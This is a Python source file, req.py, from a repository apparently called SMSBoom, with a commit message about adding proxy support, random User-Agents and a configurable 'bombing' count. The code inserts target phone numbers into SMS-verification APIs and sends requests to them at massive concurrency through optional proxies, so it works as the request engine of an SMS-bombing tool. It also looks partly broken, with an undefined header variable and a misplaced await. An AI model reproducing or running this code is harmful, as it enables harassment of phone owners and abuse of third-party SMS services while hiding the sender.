Files
SMSBoom/utils/req.py
Weclont 17523cbebc 🐞 Fix: 完善功能, 修复之前乱写的Bug.
- 通过代理调用短信接口, 支持http, socks4, socks5代理.
- 使用随机的User-Agent.
- 可指定轰炸次数, 轰炸间隔时间.
2022-07-03 01:00:43 +08:00

142 lines
4.7 KiB
Python

# encoding=utf8
# 请求的方法
import httpx
from httpx import Limits
from typing import Union, List
import asyncio
from utils import default_header_user_agent
from utils.models import API
from utils.log import logger
def reqAPI(api: API, client: Union[httpx.Client, httpx.AsyncClient]) -> httpx.Response:
if isinstance(api.data, dict):
resp = client.request(method=api.method, json=api.data,
headers=api.header, url=api.url, timeout=10)
else:
resp = client.request(method=api.method, data=api.data,
headers=api.header, url=api.url, timeout=10)
return resp
def reqFuncByProxy(api: Union[API, str], phone: Union[tuple, str], proxy: dict) -> bool:
"""通过代理请求接口方法"""
# 多手机号支持
if isinstance(phone, tuple):
phone_lst = [_ for _ in phone]
else:
phone_lst = [phone]
with httpx.Client(headers=default_header_user_agent(), verify=False, proxies=proxy) as client:
for ph in phone_lst:
try:
if isinstance(api, API):
api = api.handle_API(ph)
resp = reqAPI(api, client)
logger.info(f"{api.desc}-{resp.text[:30]}")
else:
api = api.replace("[phone]", ph).replace(" ", "").replace('\n', '').replace('\r', '')
resp = client.get(url=api, headers=default_header_user_agent())
logger.info(f"GETAPI接口-{resp.text[:30]}")
return True
except httpx.HTTPError as why:
logger.error(f"请求失败{why}")
return False
def reqFunc(api: Union[API, str], phone: Union[tuple, str]) -> bool:
"""请求接口方法"""
# 多手机号支持
if isinstance(phone, tuple):
phone_lst = [_ for _ in phone]
else:
phone_lst = [phone]
with httpx.Client(headers=default_header_user_agent(), verify=False) as client:
for ph in phone_lst:
try:
if isinstance(api, API):
api = api.handle_API(ph)
resp = reqAPI(api, client)
logger.info(f"{api.desc}-{resp.text[:30]}")
else:
api = api.replace("[phone]", ph).replace(" ", "").replace('\n', '').replace('\r', '')
resp = client.get(url=api, headers=default_header_user_agent())
logger.info(f"GETAPI接口-{resp.text[:30]}")
return True
except httpx.HTTPError as why:
logger.error(f"请求失败{why}")
return False
async def asyncReqs(src: Union[API, str], phone: Union[tuple, str], semaphore):
"""异步请求方法
:param:
:return:
"""
# 多手机号支持
if isinstance(phone, tuple):
phone_lst = [_ for _ in phone]
else:
phone_lst = [phone]
async with semaphore:
async with httpx.AsyncClient(
limits=Limits(max_connections=1000,
max_keepalive_connections=2000),
headers=default_header,
verify=False,
timeout=99999
) as c:
for ph in phone_lst:
try:
if isinstance(src, API):
src = src.handle_API(ph)
r = await reqAPI(src, c)
else:
# 利用元组传参安全因为元组不可修改
s = (src.replace(" ", "").replace("\n", "").replace("\t", "").replace(
"&", "").replace('\n', '').replace('\r', ''),)
r = await c.get(*s)
return r
except httpx.HTTPError as why:
logger.error(f"异步请求失败{type(why)}")
# logger.error(f"异步请求失败{why}")
# import aiofiles
# async with aiofiles.open("error.txt","a",encoding="utf-8") as f:
# await f.write(f"{str(s[0]) if str(s[0]) else str(src)}\n")
except TypeError:
logger.error("类型错误")
except Exception as wy:
logger.exception(f"异步失败{wy}")
def callback(result):
"""异步回调函数"""
log = result.result()
if log is not None:
logger.info(f"请求结果:{log.text[:30]}")
async def runAsync(apis: List[Union[API,str]], phone: Union[tuple, str]):
tasks = []
for api in apis:
semaphore = asyncio.Semaphore(999999)
task = asyncio.ensure_future(asyncReqs(api, phone, semaphore))
task.add_done_callback(callback)
tasks.append(task)
await asyncio.gather(
*tasks
)